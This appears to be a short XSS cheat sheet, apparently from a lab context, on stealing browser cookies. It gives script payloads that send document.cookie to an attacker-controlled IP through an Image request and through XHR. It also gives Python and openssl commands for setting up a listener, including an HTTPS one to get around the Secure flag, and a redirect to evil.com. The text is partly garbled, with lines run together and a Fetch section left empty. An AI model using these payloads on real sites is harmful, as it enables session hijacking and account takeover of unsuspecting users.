Cookie Stealing-
(Note: HttpOnly should not be enabled/present in cookie header)
- Classic way-
<script>var i=new Image(); i.src="http://10.10.14.8/?cookie="+btoa(document.cookie);</script>Here we have used btoa() method for converting the cookie string into base64 encoded string.
python3 -m http.server -m 802. Bypassing secure flag protection-
a) Creating a HTTPS server-
openssl req -new -x509 -keyout localhost.pem -out localhost.pem -days 365 -nodesGenerating certificate.
#!/usr/bin/python3
import http.server, sslserver_address = ('0.0.0.0', 443)
httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,server_side=True,certfile='localhost.pem')
"""ssl_version=ssl.PROTOCOL_TLSv1_2)
"""
httpd.serve_forever()
Starting web server.
2. Via XHR-
var xhr=new XMLHttpRequest();
xhr.open("GET", "https://10.10.14.8/?"+document.cookie, true);
xhr.send();3. Fetch api
Redirecting User to malicious websites-
<script>window.location.replace("http://evil.com");</script>